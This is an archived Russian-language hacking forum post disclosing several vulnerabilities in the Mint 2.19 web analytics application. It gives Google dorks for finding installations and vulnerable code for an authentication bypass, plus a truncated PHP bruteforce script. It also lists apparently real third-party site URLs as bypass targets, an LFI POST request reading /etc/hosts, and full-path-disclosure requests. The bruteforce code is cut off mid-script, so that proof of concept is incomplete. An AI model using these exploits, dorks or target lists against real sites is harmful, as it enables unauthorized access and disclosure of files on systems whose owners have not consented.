ANTICHAT

ANTICHAT (https://forum.antichat.io/index.php)
-   Веб-уязвимости (https://forum.antichat.io/forumdisplay.php?f=114)
-   -   Mint 2.19 (https://forum.antichat.io/showthread.php?t=411053)

Unknown 20.04.2014 19:23

************************************************** ****************************

# App Name: Mint 2.19

# Google Dork(about 1,630,000 results): "Shaun Inman. All rights reserved." intitle:"Mint: "

# Vendor Homepage: www.haveamint.com

************************************************** ****************************/

1. Email verification bypass($_COOKIE and $_GET):

Vulnerable Code(mint.php):

Код:

function isLoggedIn()
        {
                return (isset($_COOKIE['MintAuth']) && $_COOKIE['MintAuth']==md5($this->cfg['password']))?true:false;
        }

POC:

Код:

>>>>bruteforce SUCCESSFUL!!! (password=".$current_password.")\n";
                                                exit();
                                        }
                                }               
                                fclose($file);
                                echo ">>>>>bruteforce UNsuccessful :(\n";
                        } else echo "ERROR: ".$passlist." not found!\n";
                        break;       
                default:
                        echo "##### Mint 2.19 email verification bypass\n";
                        echo "##### Author: Unlog\n";
                        echo "##### Usage:\n".
                                        "\tmint.php -check www.example.com /mint/\n".
                                        "\tmint.php -bruteforce www.example.com /mint/ passlist.txt\n";
        }
?>

Additional Information:

Same vulnerability in authenticateRSS function

Vulnerable Code(mint.php):

Код:

function authenticateRSS()
        {
                return (isset($_GET['RSS']) && $_GET['RSS'] == md5($this->cfg['password']))?true:false;
        }

POC: Same as above(with some modifications)

2. _Fatal error_ authentification bupass:

Info:

If there is some fatal error like _mysql server down_, no authentification is needed to access preferences

Vulnerable Code(path.php):

Код:

if ($Mint->errors['fatal'])
{
        include(MINT_ROOT.'app/paths/errors/index.php');
        exit();
}

Google Dork: "Mint was unable to connect" intitle:"Mint:"

POC:

Код:

http://mint.ryanmccuaig.net/?preferences
http://www.stunda.nl/mint/?preferences
http://dejurka.ru/mint/?preferences
http://www.mad4milk.net/mint/?preferences
http://www.andrewgill.co.za/mint/?preferences

3. LFI in mint.php

Info:

LFI Requies access to preferences(can be obtained by using first or second exploit)

Vulnerable Code:

Код:

mint.php:
        function installPepper($pathToPepper)
        {
                include_once(MINT_ROOT.$pathToPepper);
                ...
               
\app\paths\preferences\index.php:
if (isset($_POST['MintPath']) && $_POST['MintPath'] == 'Preferences')
...
        switch($_POST['action'])
        ...
                case 'Install Pepper':
                        $Mint->tmp['pageTitle'] = 'Install Pepper';
                        $Mint->installPepper($_POST['src']);

POC:

Код:

POST http://***/ HTTP/1.0
Host: ***.com
UserAgent: Opera/9.60 (Windows NT 5.1; U; en) Presto/2.1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, */*;q=0.1
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-length: 58

MintPath=Preferences&action=Install Pepper&src=/etc/hosts&

4. Multiple Full Path Disclosure

Vulnerable Code:

Код:

if (!defined('MINT')) { header('Location:/'); }; // Prevent viewing this file
POC:

Код:

GET http://localhost/mint/app/includes/foot.php?benchmark
GET http://localhost/mint/app/includes/foot.php?observe
GET http://localhost/mint/app/paths/auth/index.php
GET http://localhost/mint/app/paths/custom/index.php?custom
GET http://localhost/mint/app/paths/custom/index.php?RSS
GET http://localhost/mint/app/paths/display/display.php
GET http://localhost/mint/app/paths/display/index.php?tab
GET http://localhost/mint/app/paths/errors/index.php
GET http://localhost/mint/app/paths/feedback/index.php
GET http://localhost/mint/app/paths/install/configuration.php
GET http://localhost/mint/app/paths/install/instructions.php
POST http://localhost/mint/app/paths/install/index.php | action=Activate
POST http://localhost/mint/app/paths/install/index.php | action=Accept
POST http://localhost/mint/app/paths/install/index.php | action=Configure
and etc



Время: 09:45